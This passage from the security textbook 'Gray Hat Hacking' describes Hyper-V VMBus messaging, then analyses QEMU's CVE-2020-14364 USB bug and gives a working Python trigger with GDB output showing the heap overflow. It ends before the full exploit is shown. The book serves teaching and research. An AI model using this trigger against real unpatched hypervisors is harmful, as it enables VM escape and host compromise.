of elements in this sequence is set in rangecount ❹, and the total size (in bytes) of this
sequence in range_buflen ❺. The gpa_range_size ❻ function calculates this size by
encoding the range’s list.
   When the buffer we want to create is small enough, it will fit in a single “GPADL
header” message; however, it could be the case that the number of PFNs and/or ranges
required to represent larger buffers won’t fit in a single message (the message size used
by HvCallPostMessage is limited to 240 bytes). In such cases, we split the contents of
Gray Hat Hacking: The Ethical Hacker’s Handbook
              the “range” field into chunks to fit this size. The first chunk is sent with the “GPADL
              header” and the rest of them in a series of “GPADL body” messages (msgtype 9).
                 A “GPADL body” message contains a header followed by a chunk. The header encod-
              ing is as follows:
              VmbusChannelGPADLBody = c.Struct(
                  'hdr'       / VmbusChannelMessageHeader,
                  'msgnumber' / c.Int32ul,❶
                  'gpadl'     / c.Int32ul❷
              )

                 The msgnumber ❶ field identifies the chunk we are sending (we increment this value
              for every chunk we send), and the gpadl ❷ field is set to the same value we used in the
              GPADL header message.
                 After we send the GPADL header, and (optionally) one or more GPADL body mes-
              sages, we are notified of the GPADL creation with a “GPADL created” (msgtype 10)
              response. The layout of this message is as follows:
              VmbusChannelGPADLCreated = c.Struct(
                  'hdr'             / VmbusChannelMessageHeader,
                  'child_relid'     / c.Int32ul,❶
                  'gpadl'           / c.Int32ul,❷
                  'creation_status' / c.Int32ul❸
              )

                 The child_relid ❶ and gpadl ❷ fields contain the same values we supplied, and
              creation_status ❸ should be zero.
                 Finally, to set up the ring-buffers, we send an “open channel” (msgtype 5) request.
              The layout of this message is as follows:
              VmbusChannelOpenChannel = c.Struct(
                  'hdr'               / VmbusChannelMessageHeader,
                  'child_relid'       / c.Int32ul,❶
                  'openid'            / c.Int32ul,❷
                  'ringbuffer_gpadl' / c.Int32ul,❸
                  'target_vp'         / c.Int32ul,❺
                  'downstream_offset' / c.Int32ul,❹
                  'user_data'         / c.Bytes(120),❻
              )

                 As usual, child_relid ❶ is set to the same value as the child_relid field of the offer.
              We set openid ❷ to a value of our choice, and we pass the identifier of our newly created
              GPADL to ringbuffer_gpadl ❸. In downstream_offset ❹, we pass an offset (in pages)
              that will split this buffer in two ring-buffers. We will set the target virtual processor ❺
              and user_data ❻ to zero.
                 If the request succeeds, we get an “open channel result” (msgtype 6) reply:
              VmbusChannelOpenResult = c.Struct(
                  'hdr'         / VmbusChannelMessageHeader,
                  'child_relid' / c.Int32ul,❶
                  'openid'      / c.Int32ul,❷
                  'status'      / c.Int32ul,❸
              )
                                                                                     Chapter 25: Inside Hyper-V
   The child_relid ❶ and openid ❷ fields contain the same values we supplied, and
status ❸ should be zero. At this point, we can communicate with the device through the
two ring-buffers.

             TIP The GHHv6/ch25/labs/vmbus.py module contains the implementation
             of everything explained so far. Complement this chapter by reading its code.

Ring-Buffer Communication
We have a shared buffer created from a GPADL that was split into two ring-buffers: the
first is for transmitting and the second is for receiving. The transmitting ring-buffer starts
at the GPADL’s first GPFN and ends at the GPFN located downstream_offset entries
later (as we supplied in the “open channel” request). The receiving ring-buffer starts at
the end of the transmitting buffer and ends at the last GPFN of the GPADL.
    The actual data to transmit (or receive) starts at the second page of each ring-buffer.
The first page of each ring-buffer contains a structure with the ring-buffer’s state:
RingBuffer = c.Struct(
    'write_index'     / c.Int32ul,❶
    'read_index'      / c.Int32ul,❷
    'interrupt_mask' / c.Int32ul,
    'pending_send_sz' / c.Int32ul,
    'reserved'        / c.Bytes(48),
    'feature_bits'    / c.Int32ul
)

    Additional (reserved) fields might follow the ones from this structure, and these are
further followed by padding bytes to fill the page. For basic use, we only need to care

                                                                                                                  PART V
about write_index ❶ and read_index ❷; the rest of the structure can be left zeroed. Both
indexes represent an offset in bytes from the start of the ring-buffer data area (4,096 bytes
after the ring-buffer state).
    When data is written into the ring-buffer, write_index is incremented by the length
of the data; if the increment is larger than the ring-buffer size, the index is wrapped
around. If write_index is larger than the read_index, the space left in the ring-buffer
is the ring-buffer size minus write_index, plus read_index. If write_index is less than
read_index, the space left is read_index minus write_index. When data is read from the
ring-buffer, read_index is incremented in the same fashion.
    If read_index and write_index are equal, the ring-buffer is either empty or full,
depending on the situation (either read_index reaching write_index or write_index
reaching read_index). When this happens, we should notify the host, which can be done
by calling HvCallSignalEvent using the connection ID field of the offer corresponding to
the device we are communicating with and the event flag zero.
    Data is encapsulated in “packets” containing a header with the information needed to
identify and read the whole packet, regardless of its inner layout:
class PacketType(Enum):❷
    VM_PKT_INVALID = 0
    VM_PKT_SYNCH = 1
    VM_PKT_ADD_XFER_PAGESET = 2
    VM_PKT_RM_XFER_PAGESET = 3
Gray Hat Hacking: The Ethical Hacker’s Handbook
                     VM_PKT_ESTABLISH_GPADL = 4
                     VM_PKT_TEARDOWN_GPADL = 5
                     VM_PKT_DATA_INBAND = 6❸
                     VM_PKT_DATA_USING_XFER_PAGES = 7
                     VM_PKT_DATA_USING_GPADL = 8
                     VM_PKT_DATA_USING_GPA_DIRECT = 9
                     VM_PKT_CANCEL_REQUEST = 10
                     VM_PKT_COMP = 11❼
                     VM_PKT_DATA_USING_ADDITIONAL_PKT = 12
                     VM_PKT_ADDITIONAL_DATA = 13

              PacketHeader = c.Struct(
                  'type'     / c.Int16ul,❶
                  'offset8' / c.Int16ul,❹
                  'len8'     / c.Int16ul,❺
                  'flags'    / c.Int16ul,❻
                  'trans_id' / c.Int64ul❽
              )

                 The type ❶ field is one of the values defined in PacketType ❷; the most common is
              VM_PKT_DATA_INBAND ❸. In offset8 ❹, we have the offset (in 8-byte blocks, from
              the start of the header) of the next header and, in len8 ❺, we have the packet’s total size
              (in 8-byte blocks, including the packet header). The flags ❻ field is usually zero, but in
              some cases it is set to one to indicate that a VM_PKT_COMP ❼ should be sent by the
              receiver. The transaction identifier ❽ is a value of our choice when we send a request; if
              we are responding to a request, we should set the same value as in the request.
                 Packets are padded to an 8-byte boundary, and each packet ends with an 8-byte trailer
              (not included in len8 calculation).
                 VMBus devices implement their own protocols, but they all share this same basic
              transport. For space reasons, we won’t discuss the different protocol implementations;
              however, a sample script is included (GHHv6/ch25/labs/time_sync.py) that connects to
              the Time Synch integration component and displays the host’s time. The script makes
              use of the GHHv6/ch25/labs/vmbus.py module to open a channel and communicate
              through ring-buffers.

              Summary
              This chapter started with an overview of Hyper-V’s architecture. Then we covered para-
              virtualization features specific to Hyper-V, including functionality implemented in the
              VMM (synthetic MSRs, SynIC, and hypercalls) and in the root partition (VMBus).

              For Further Reading
              As mentioned in the introduction, this chapter is just an overview to give you a starting
              point to conduct your own research.
                 One way to learn more about Hyper-V is by reverse-engineering it. Most of the vir-
              tualization stack has debugging symbols and can be analyzed with ease with tools like
              Hex-Rays and WinDbg. The exception is the VMM component (hvix64.exe), which has
                                                                                  Chapter 25: Inside Hyper-V
no public symbols and requires a lot of effort to understand. A couple of IDA plug-ins
can be of great help:

   • MSR-decoder and VMX-helper, developed by Behrooz Abbassi (@rceninja), can
     be found at https://github.com/RceNinja/Re-Scripts/tree/master/scripts.
   • FakePDB, developed by Mikhail Paulyshka (@Mixailos), can be used to generate
     a PDB file from the IDA database. We can load this file with WinDbg when
     debugging the VMM.
  Another way is by reading the existing official and unofficial documentation. The most
complete list of Hyper-V research resources has been recompiled by Arthur Khudyaev
(@gerhart_x) and can be found at https://github.com/gerhart01/Hyper-V-Internals/.

References
   1. “Hypervisor-protected Code Integrity enablement,” https://docs.microsoft.com/
      en-us/windows-hardware/design/device-experiences/oem-hvci-enablement.
   2. “How Windows Defender Credential Guard works,” https://docs.microsoft.com/
      en-us/windows/security/identity-protection/credential-guard/credential-guard-
      how-it-works.
   3. “Microsoft Defender Application Guard overview,” https://docs.microsoft.com/
      en-us/windows/security/threat-protection/microsoft-defender-application-guard/
      md-app-guard-overview.
   4. “Microsoft Hyper-V Bounty Program,” www.microsoft.com/en-us/msrc/bounty-

                                                                                                               PART V
      hyper-v.
   5. “HyperFuzzer: An Efficient Hybrid Fuzzer for Virtual CPUs,” www.microsoft.com/
      en-us/research/publication/hyperfuzzer-an-efficient-hybrid-fuzzer-for-virtual-cpus/.
   6. “Hyper-V Integration Services,” https://docs.microsoft.com/en-us/virtualization/
      hyper-v-on-windows/reference/integration-services.
   7. “Universally unique identifier,” https://en.wikipedia.org/wiki/Universally_unique_
      identifier.
   8. “Make your own integration services,” https://docs.microsoft.com/en-us/
      virtualization/hyper-v-on-windows/user-guide/make-integration-service.
   9. “HV_PARTITION_PRIVILEGE_MASK,” https://docs.microsoft.com/en-us/
      virtualization/hyper-v-on-windows/tlfs/datatypes/hv_partition_privilege_mask.
 10. “Hypervisor Top-Level Functional Specification,” https://docs.microsoft.com/
     en-us/virtualization/hyper-v-on-windows/reference/tlfs.
 11. “Using MDLs,” https://docs.microsoft.com/en-us/windows-hardware/drivers/
     kernel/using-mdls.
This page intentionally left blank
  Hacking Hypervisors
  Case Study
                                                                             CHAPTER

                                                                                         26
  In this chapter, we cover the following topics:
      • Root cause analysis of a device emulation vulnerability in QEMU
      • USB and EHCI basics
      • Development of a VM escape exploit for a user-mode worker process (QEMU)

In this chapter, we will analyze and exploit CVE-2020-14364, 1 by Xiao Wei and Ziming
Zhang, in QEMU’s USB emulation code. It is a simple and reliable vulnerability, which
makes it a great case study. Hypervisors such as KVM and Xen use QEMU as their
worker process component, so when we target QEMU, we will be performing user-
mode exploitation.
   This chapter assumes that on your host you are using a Linux installation with KVM
virtualization enabled and that you have a working install of Docker. All the code from
this chapter is available at GitHub:
$ git clone https://github.com/GrayHatHacking/GHHv6.git

  A Dockerfile includes the environment and all the tools used in this chapter. All the
code and examples in this chapter should be executed from within the Docker container.
The KVM device in the host must be passed through to the Docker container:
$ cd GHHv6/ch26/
$ docker build -t kali .
$ docker run --device=/dev/kvm --network host -it kali bash

Once inside the Docker container, the code can be found inside the /labs directory.

Bug Analysis
We need to start with an introduction to the Universal Serial Bus (USB). We’ll discuss
just the minimum required to understand the affected code. After this introduction, we’ll
take a look at the commit that fixes the issue and perform a root cause analysis of the bug.

Gray Hat Hacking: The Ethical Hacker’s Handbook
              USB Basics
              A USB system is composed of a host connected to one or more USB devices. The host
              contains the USB software, a USB host controller, and an embedded root hub. A hub
              is a special class of USB device that provides attachment points known as ports. A USB
              device can be either a hub or a function. Another kind of device, known as a compound
              device, can package a hub and several functions in a single unit. Devices are connected
              in a tiered star topology with an imposed maximum of seven tiers to prevent circular
              connections. The first tier starts at the host’s root hub, forming a tree-like configuration;
              however, from the logical point of view of the host, all devices look like they were directly
              connected to the root hub.

                                 NOTE What is explained in this section is an oversimplified, tiny fraction of
                                 what USB really encompasses. Readers interested in the whole picture can
                                 find a link to the USB 2.0 specification in the “For Further Reading” section.

              Endpoints
              USB devices have a collection of endpoints with specific data transfer characteristics
              (among these is the data flow direction). Each endpoint has a unique identification
              number called the endpoint number. All USB devices must implement a default control
              method called endpoint zero. This endpoint is composed of two (one input, one output)
              endpoints assigned to the same endpoint number (zero). Endpoint zero is always accessi-
              ble, and it is used to initialize or manipulate the device through the default control pipe.

              Pipes
              Pipes are used to move data between the host and a device’s endpoint. There are two
              kinds of pipes: stream pipes and message pipes (the default control pipe is a message
              pipe). Message pipes are bidirectional; they assign a single endpoint number for both
              input and output endpoints. Unlike stream pipes, data transmission in message pipes
              follows some USB-defined structure based on control transfers.

              Control Transfers
              Control transfers can be used to configure a device, send commands to it, or query its
              status. A control transfer can be classified in three types: control read, control write, and
              no-data control. Control reads and control writes have three stages: the setup stage, data
              stage, and status stage. In a no-data control, there is only the setup stage and status stage.
              The setup stage involves a setup transaction, which is initiated by the host to indicate the
              type of control access the function (device) should perform. The data stage involves one
              or more data transactions in the direction assigned by the setup transaction. The status
              stage is used to report the result of a previous setup/data stage.
                                                                       Chapter 26: Hacking Hypervisors Case Study
Packets
A transaction involves the interchange of packets between host and a function. A packet
contains a group of fields; here are some important ones:

   • PID Contains the packet type and a check code that is a complement of the
     packet type.
   • Function address In our case, we are only concerned about the default
     address zero.
   • Endpoint address In our case, we will use the endpoint zero.
   • Data Contains 0 to 1024 bytes of data; each byte has its least significant bit
     (LSB) shifted one position from the next byte.
   • Token CRC For SETUP, IN, and OUT packet types, this field is a 5-bit cyclic
     redundancy check (CRC) computed from the function and endpoint address fields.
   • Data CRC A 16-bit CRC of the data field.
   Which fields are present in a particular packet depend on their packet type (encoded
in the PID field). A packet type falls into any of the following groups:

   • Token Includes the OUT, IN, SOF, and SETUP packet types. These packets
     contain the following fields: PID, function address, endpoint address, and
     token CRC.
   • Data Includes the DATA0, DATA1, DATA2, and MDATA packet types. Data
     packets include a PID field, followed by a variable number (0 to 1024) of data
     bytes, and the data CRC field.

                                                                                                                    PART V
   • Handshake Includes the ACK, NAK, STALL, and NYET packet types. These
     packets contain only the PID field.
   • Special Includes the PRE, ERR, SPLIT, PING, and RESERVED types.
  Control transfers (and their stages) can be described in terms of the packets inter-
changed between the host and the function in the following way:

   • The setup stage consists of one setup transaction. In the setup transaction, the host
     sends a SETUP packet followed by a DATA0 packet. On success, the function
     replies with an ACK packet.
   • The data stage involves one or more data transactions in the direction assigned by
     the setup stage. In a data transaction, if the control transfer is a control write, the
     host sends an OUT packet followed by a DATAx (DATA1 or DATA0) packet.
     In a control read, the host sends an IN packet and receives a DATAx packet from
     the function. The receiver of the DATAx packet must send an ACK on success or
     otherwise reject it with a NAK or STALL.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                    • The final status stage consists of a status transaction. If the control transfer is a
                      control read, the status stage begins with the host sending an OUT and a zero-
                      length DATA1 packet. If the command was completed, the function replies with
                      an ACK. If the function is still busy, it must reply with a NAK, and if there was
                      an error, it replies with a STALL. In a control write, the host sends an IN packet
                      and the function replies with zero-length DATA1. On success, the host replies
                      with an ACK or otherwise with a NAK/STALL.

              Standard Requests
              Standard requests can be sent to a device over the default control pipe, and they begin
              with a SETUP packet containing an 8-byte data field. This data field encodes the follow-
              ing parameters:

                    • bmRequestType An 8-bit bitmap encoding the request characteristics. Bits 0–4
                      indicate the recipient type: device, interface, endpoint, other, or reserved. Bits 5–6
                      indicate the request type: standard, class vendor, or reserved. Bit 7 indicates the
                      direction of the data transfer: either host to device or device to host.
                    • bRequest An 8-bit field with the request type. Standard request codes are
                      GET_STATUS, CLEAR_FEATURE, SET_FEATURE, SET_ADDRESS,
                      GET_DESCRIPTOR, SET_DESCRIPTOR, GET_CONFIGURATION,
                      SET_CONFIGURATION, GET_INTERFACE, SET_INTERFACE, and
                      SYNCH_FRAME
                    • wValue A 16-bit request-dependent field to pass a request parameter.
                    • wIndex Another 16-bit request-dependent field, typically to pass an index
                      or offset.
                    • wLength A 16-bit field indicating the number of bytes to transfer in the data
                      stage of the transfer.

              Lab 26-1: Patch Analysis Using GitHub API

              Let’s find the commit that fixed this CVE in QEMU’s repository. To do this, we can use
              GitHub’s REST API2 and search for commits containing “CVE-2020-14364” in their
              description. The jq3 tool can be used to parse and filter the resulting JSON, displaying
              only the information we need: the commit URL and the commit message.
              ┌──(root ghh6)-[/]
              └─# curl -s -H "Accept: application/vnd.github.cloak-preview+json" https://
              api.github.com/search/commits?q=repo:qemu/qemu+CVE-2020-14364 | jq '.items[0].
              commit | .url + "\n" + .message' -r
              https://api.github.com/repos/qemu/qemu/git/commits/
              b946434f2659a182afc17e155be6791ebfb302eb
              usb: fix setup_len init (CVE-2020-14364)

              Store calculated setup_len in a local variable, verify it, and only write it to
              the struct (USBDevice->setup_len) in case it passed the sanity checks.
                                                                          Chapter 26: Hacking Hypervisors Case Study
This prevents other code (do_token_{in,out} functions specifically)from working
with invalid USBDevice->setup_len values and overrunning the
USBDevice->setup_buf[] buffer.

  Now that we have the commit URL, we can perform another query and get the code
changed:
┌──(root ghh6)-[/]
└─# curl -s -H "Accept: application/vnd.github.groot-preview+json" https://api.
github.com/repos/qemu/qemu/commits/b946434f2659a182afc17e155be6791ebfb302eb | jq
.files[0].patch -r | colordiff
@@ -129,6 +129,7 @@ void usb_wakeup(USBEndpoint *ep, unsigned int stream)
 static void do_token_setup(USBDevice *s, USBPacket *p)
 {
     int request, value, index;
+    unsigned int setup_len;

     if (p->iov.size != 8) {
         p->status = USB_RET_STALL;
@@ -138,14 +139,15 @@ static void do_token_setup(USBDevice *s, USBPacket *p)
     usb_packet_copy(p, s->setup_buf, p->iov.size);
     s->setup_index = 0;
     p->actual_length = 0;
-    s->setup_len    = (s->setup_buf[7] << 8) | s->setup_buf[6];❶
-    if (s->setup_len > sizeof(s->data_buf)) {
+    setup_len = (s->setup_buf[7] << 8) | s->setup_buf[6];❷
+    if (setup_len > sizeof(s->data_buf)) {
         fprintf(stderr,
                 "usb_generic_handle_packet: ctrl buffer too small (%d > %zu)\n",
-                 s->setup_len, sizeof(s->data_buf));
+                 setup_len, sizeof(s->data_buf));
         p->status = USB_RET_STALL;
         Return;
     }
+    s->setup_len = setup_len;

                                                                                                                       PART V
     request = (s->setup_buf[0] << 8) | s->setup_buf[1];
     value   = (s->setup_buf[3] << 8) | s->setup_buf[2];

             NOTE do_parameter was also affected but we will focus just on
             do_token_setup.

   The affected function do_token_setup is in charge of processing SETUP packets
sent by the host (we refer to the host in the USB sense; this “host” is actually a guest
VM) to an endpoint. The USBDevice *s parameter is a pointer to the device’s state, and
USBPacket *p contains information about the incoming packet. The function verifies
that the length of the SETUP data field is 8 bytes. If the check fails, p->status is set to
USB_RET_STALL and the function bails out; otherwise, usb_packet_copy copies the
packet data contents to s->setup_buf.
   We can see code that the vulnerable code ❶ sets s->setup_len to the contents of
s->setup_buf, corresponding to the “wLength” field (the number of bytes to transfer in the
data stage). The new code ❷ uses a local variable instead without affecting the device’s state.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              The next line checks whether this value is larger than the size of s->data_buf (a 4096-byte
              buffer used to copy data in the data stage). If it is, the function bails out. From the code diff
              and the commit description, we can assume that it is possible to send a SETUP packet with
              a wLength field larger than 4096, and do_token_setup will fail to process it; however, an
              invalid s->setup_len will be set. This invalid state can be used in the data stage to overflow
              the s->data_buf when transferring data.

              Developing a Trigger
              Now with a basic understanding of the issue, we can start working first on a trigger and
              then on a full working exploit. We will make use of our own tools, based on the frame-
              work developed in Chapter 24. The advantage of using our framework is that we avoid
              the extra software layers of a general-purpose operating system (OS). This way, we can
              test and debug our code with more ease, thus shortening the exploit development time.
              After our framework-based exploit is working, it could be ported to any particular OS.

              Setting Up the Target
              First, we need a vulnerable QEMU version (v5.1.0-rc3). The Docker container provided
              for this chapter already includes it. The affected USB controller is not enabled by default,
              so we must append it to QEMU’s command line. Also we need to attach a USB device
              to it. Finally, we want to be able to debug the QEMU process, so we will run it from
              gdbserver.4

                                 NOTE All source files from this chapter can be found under the /labs
                                 directory inside the Docker container.

                  Let’s take a look at how our Guest sub-class is implemented in /labs/qemu_guest.py:
              from subprocess import Popen, PIPE, DEVNULL
              import guest

              class Guest(guest.Guest):
                  debugger = 'gdbserver 127.0.0.1:2345'
                  stderr = True
                  def __enter__(self):
                      self.proc = Popen(
                          (f'exec {self.debugger} qemu-system-x86_64 '
                          '-display none -boot d -cdrom kernel_bios.iso '
                          '-m 300M -serial stdio -enable-kvm '
                          '-device usb-ehci,id=ehci '
                          '-device usb-mouse,bus=ehci.0'
                          ),
                          stdin=PIPE, stdout=PIPE,
                          stderr={True: None, False: DEVNULL}[self.stderr],
                          shell=True
                      )
                      return self
                                                                        Chapter 26: Hacking Hypervisors Case Study

Lab 26-2: Scanning the PCI Bus

With this new setup, the Enhanced Host Controller Interface (EHCI) controller should
be present in the guest’s PCI bus. We can verify it with the pci.py module included in our
framework. This module injects code to scan the PCI bus after our guest’s kernel boots:
┌──(root ghh6)-[/]
└─# cd /labs; python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from qemu_guest import Guest
>>> from pci import Session
>>> Guest.debugger = ''
>>> Session(Guest).run()
... omitted for brevity …
00:04:00: USB (EHCI)
      BAR MEM-space                 : 0xfebf1000❹       size: 0x1000
      BAR MEM-space                 : 0x0                size: 0x0
      BAR MEM-space                 : 0x0                size: 0x0
      vendor_id                     : 0xe000
      device_id                     : 0x40
      command                       : 0x107
      status                        : 0x0
      revision_id                   : 0x10
      prog_if                       : 0x20❸
      subclass                      : 0x3❷
      class_code                    : 0xc❶

             NOTE Our new base class is now called Session, and generalizes on the

                                                                                                                     PART V
             Fuzzer class we implemented in Chapter 24.

  The EHCI controller has class-code 0x0c ❶, subclass 0x03 ❷, and interface (prog_if)
0x20 ❸. BAR0 points to the base of the EHCI register space at address 0xfebf1000 ❹.

The EHCI Controller
The EHCI controller manages the communication between USB devices and the host’s
software stack. Its register space is composed of two sets of registers: capability registers
and operational registers. We need to access the CAPLENGTH (capability) register to
get the offset at where the operational registers start. The registers from the operational
register set are what we use to control the operational state of the controller.
   EHCI provides two schedule interfaces for data transfers: the periodic schedule and
the asynchronous schedule. Both mechanisms are based on the EHCI controller walking
through data structures present in the host memory, representing queues of work items.
We will use the asynchronous schedule because it is simpler, but either schedule interface
can fulfill our needs.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 The asynchronous schedule walks a data structure known as the asynchronous trans-
              fer list, which is a circular list of Queue Head (QH) elements. The operational register
              ASYNCLISTADDR holds a pointer to the next QH element to be processed by the
              asynchronous schedule. A Queue Head starts with an item type (in this case, a QH
              type) and a pointer to the next QH. The next fields are the endpoint’s characteristics
              and capabilities, followed by a pointer to the current Queue Element Transfer Descriptor
              (qTD). The rest of the QH is a transfer overlay area associated with the current qTD.
              A qTD is used to represent one or more USB transactions. It contains a pointer to the
              next qTD and alternate qTDs, a qTD token, and five buffer pointers allowing transfers
              of up to 20KB. The qTD token encodes (among other things) the total number of bytes
              to transfer (from/to the buffer pointers) and a PID code that is used to generate the IN,
              OUT, or SETUP tokens.
                 To enable or disable the asynchronous schedule, as well as to run or stop it, we use
              the operational register USBCMD. Commands issued through USBCMD don’t have an
              immediate effect, so we need to check status changes polling the USBSTS register. The
              controller supports several “Port Status and Control” registers (PORTSCn); we will only
              use the PORTSC0 register to enable and reset the port zero.
                 Our framework’s EHCI-handling logic can be found in the ehci.py module (we won’t
              show its code for space reasons), separated away from the exploit’s code. Here are the
              methods provided by this module:

                    • qtd_single Generates a single qTD given a token and a data argument.
                    • qh_single Generates a single (self-referencing) QH given a qTD.
                    • port_reset Sets a “port reset” followed by a “port enabled” in PORTSC0.
                    • async_sched_stop Stops the asynchronous schedule.
                    • async_sched_run Given a QH argument, sets ASYNCLISTADDR and runs
                      the asynchronous schedule.
                    • run_single Takes a token and a data argument and then runs a transaction by
                      using the previous methods.
                    • request Generates the 8-byte data field information for standard requests.
                    • setup Takes a request argument, generates a SETUP token, and calls run_single.
                    • usb_in Takes a data length argument, generates an IN token, and calls run_single.
                      It reads back the data transferred from the function and returns it as a byte string.
                    • usb_out Takes a data (IOVector) argument and transfers it to the function (OUT).

                                 NOTE The IOVector and Chunk classes are defined in remotemem.py.
                                 These allow us to represent ranges of memory with “holes” in them, thus
                                 avoiding excessive data transfers over the virtual serial port.
                                                                 Chapter 26: Hacking Hypervisors Case Study
Triggering the Bug
Previously, we determined that the bug allows us to set an invalid s->setup_len by
sending a SETUP packet with a wLength field larger than 4096. At the data stage,
s->data_buf can be overflown when processing an OUT packet.
   The QEMU function that processes OUT packets is called do_token_out and can
be found at /qemu/hw/usb/core.c (inside the Docker container). Let’s see under what
conditions this overflow can be triggered:
static void do_token_out(USBDevice *s, USBPacket *p)
{
    assert(p->ep->nr == 0);
    switch(s->setup_state) {
    case SETUP_STATE_ACK:
        if (s->setup_buf[0] & USB_DIR_IN) {
            s->setup_state = SETUP_STATE_IDLE;
            /* transfer OK */
        } else {
            /* ignore additional output */
        }
        break;

    case SETUP_STATE_DATA:❸
        if (!(s->setup_buf[0] & USB_DIR_IN)) {
             int len = s->setup_len - s->setup_index;❷
             if (len > p->iov.size) {
                 len = p->iov.size;
             }
             usb_packet_copy(p, s->data_buf + s->setup_index, len);❶
             s->setup_index += len;
             if (s->setup_index >= s->setup_len) {
                 s->setup_state = SETUP_STATE_ACK;
             }

                                                                                                              PART V
             return;
        }
        s->setup_state = SETUP_STATE_IDLE;
        p->status = USB_RET_STALL;
        break;
    default:
        p->status = USB_RET_STALL;
    }
}

   A call to usb_packet_copy ❶ with a controlled len ❷ will be reached when
s->setup_state is SETUP_STATE_DATA ❸. However, when processing a corrupted
SETUP packet, do_token_setup returns prior to setting s->setup_state. We can work
around this limitation by previously sending another SETUP packet. Let’s take a look
again at how SETUP packets are handled by do_token_setup (/qemu/hw/usb/core.c):
static void do_token_setup(USBDevice *s, USBPacket *p)
{
    int request, value, index;
    if (p->iov.size != 8) {
        p->status = USB_RET_STALL;
        return;
    }
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  usb_packet_copy(p, s->setup_buf, p->iov.size);
                  s->setup_index = 0;
                  p->actual_length = 0;
                  s->setup_len    = (s->setup_buf[7] << 8) | s->setup_buf[6];
              ... omitted for brevity …
                  if (s->setup_buf[0] & USB_DIR_IN) {
                      usb_device_handle_control(s, p, request, value, index,
              s->setup_len, s->data_buf);
                      if (p->status == USB_RET_ASYNC) {
                          s->setup_state = SETUP_STATE_SETUP;
                      }
                      if (p->status != USB_RET_SUCCESS) {
                          return;
                      }

                         if (p->actual_length < s->setup_len) {
                              s->setup_len = p->actual_length;
                         }
                         s->setup_state = SETUP_STATE_DATA;
                     } else {
                         if (s->setup_len == 0)
                              s->setup_state = SETUP_STATE_ACK;
                         else
                              s->setup_state = SETUP_STATE_DATA;❶
                     }
                     p->actual_length = 8;
              }

                 If we send a SETUP packet containing a valid wLength, this can lead to a code path
              that sets s->setup_state to SETUP_STATE_DATA ❶. This means that the buffer over-
              flow can be triggered by sending two consecutive SETUP packets (with the first one
              containing a valid wLength) and one OUT packet.
                 The actual copy operation is performed by usb_packet_copy (/qemu/hw/usb/core.c).
              If we take a closer look at this function, we can see that the copy direction is determined
              by the packet’s PID:
              void usb_packet_copy(USBPacket *p, void *ptr, size_t bytes)
              {
                  QEMUIOVector *iov = p->combined ? &p->combined->iov : &p->iov;

                     assert(p->actual_length >= 0);
                     assert(p->actual_length + bytes <= iov->size);
                     switch (p->pid) {
                     case USB_TOKEN_SETUP:
                     case USB_TOKEN_OUT:❶
                         iov_to_buf(iov->iov, iov->niov, p->actual_length, ptr, bytes);
                         break;
                     case USB_TOKEN_IN:❷
                         iov_from_buf(iov->iov, iov->niov, p->actual_length, ptr, bytes);
                         break;
                     default:
                         fprintf(stderr, "%s: invalid pid: %x\n", __func__, p->pid);
                         abort();
                     }
                     p->actual_length += bytes;
              }
                                                                       Chapter 26: Hacking Hypervisors Case Study
   For SETUP or OUT packets, iov_to_buf ❶ is called. Meanwhile, for IN packets,
iov_from_buf ❷ is called.
   Based on what we already know, let’s write a proof of concept that triggers the overflow
and smashes 32 bytes past the buffer. The following code can be found at /labs/trigger.py:
import ehci
from qemu_guest import Guest
from remotemem import IOVector, Chunk

class Trigger(ehci.Session):
    retry_exceptions = False
    timeout = 0

    def trigger_overflow(self, overflow_len, data):
        self.setup(self.request(0, 0, 0, 0, 0x100))❶
        self.setup(self.request(0, 0, 0, 0, overflow_len))❷
        self.usb_out(IOVector([Chunk(data)]))❸

    def on_boot(self, body):
        super().on_boot(body)
        self.port_reset()
        self.trigger_overflow(0x1020, b'\xff' * 0x1020)

if __name__ == "__main__":
    Trigger(Guest).run()

  The first SETUP ❶ packet (valid length) causes s->state to be set with
SETUP_STATE_DATA, and the second SETUP ❷ packet corrupts s->setup_len to
overflow_len. The OUT ❸ packet writes the contents of data to s->data_buf and
overflows it by 32 bytes.

                                                                                                                    PART V
Lab 26-3: Running the Trigger

Let’s see in the debugger how the trigger overflows the buffer:
┌──(root ghh6)-[/labs]
└─# python3 trigger.py &
[2] 1089
┌──(root ghh6)-[/labs]
└─# gdb -q
(gdb) set pagination off
(gdb) handle SIGUSR1 nostop noprint
Signal        Stop      Print   Pass to program Description
SIGUSR1       No        No      Yes             User defined signal 1
(gdb) target remote localhost:2345
...omitted for brevity…
0x00007f8b7d70e090 in _start () from target:/lib64/ld-linux-x86-64.so.2
(gdb) b usb_packet_copy if bytes == 0x1020❶
Breakpoint 1 at 0x560776e4c6a5: file /qemu/hw/usb/core.c, line 588.
(gdb) c
...omitted for brevity…
Thread 1 "qemu-system-x86" hit Breakpoint 1, usb_packet_copy
(p=0x560779903630,
ptr=0x56077a66509c, bytes=4128) at /qemu/hw/usb/core.c:588
588         QEMUIOVector *iov = p->combined ? &p->combined->iov : &p->iov;
(gdb) finish❷
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Run till exit from #0 usb_packet_copy (p=0x560779903630, ptr=0x56077a66509c,
              bytes=4128) at /qemu/hw/usb/core.c:588
              do_token_out (s=0x56077a664fb0, p=0x560779903630) at /qemu/hw/usb/core.c:244
              244                 s->setup_index += len;
              (gdb) x/4gx &s->data_buf[4096]❸
              0x56077a66609c: 0xffffffffffffffff      0xffffffffffffffff
              0x56077a6660ac: 0xffffffffffffffff      0xffffffffffffffff

                 Once we attach with GDB, we set a conditional breakpoint at usb_packet_copy ❶
              that breaks if the length of the copy is 0x1020 bytes. When the breakpoint is hit, we let
              the function perform the copy ❷ and return to the caller. After that, we can examine the
              contents past the end of s->data_buf ❸, and we can confirm that the contents have been
              smashed with the 0xff pattern.

              Exploitation
              This section covers all the steps required to fully exploit this vulnerability. We will start
              from the previous trigger code and will iteratively build more advanced primitives until
              finally getting code execution via a ret2lib technique.
                 The full working exploit code can be found in qemu_xpl.py. To manipulate C struc-
              tures with ease, a CStruct class is provided in cstruct.py. This is a customized subclass of
              construct.Struct that provides C-like alignment and offset information for struct fields.

              Relative Write Primitive
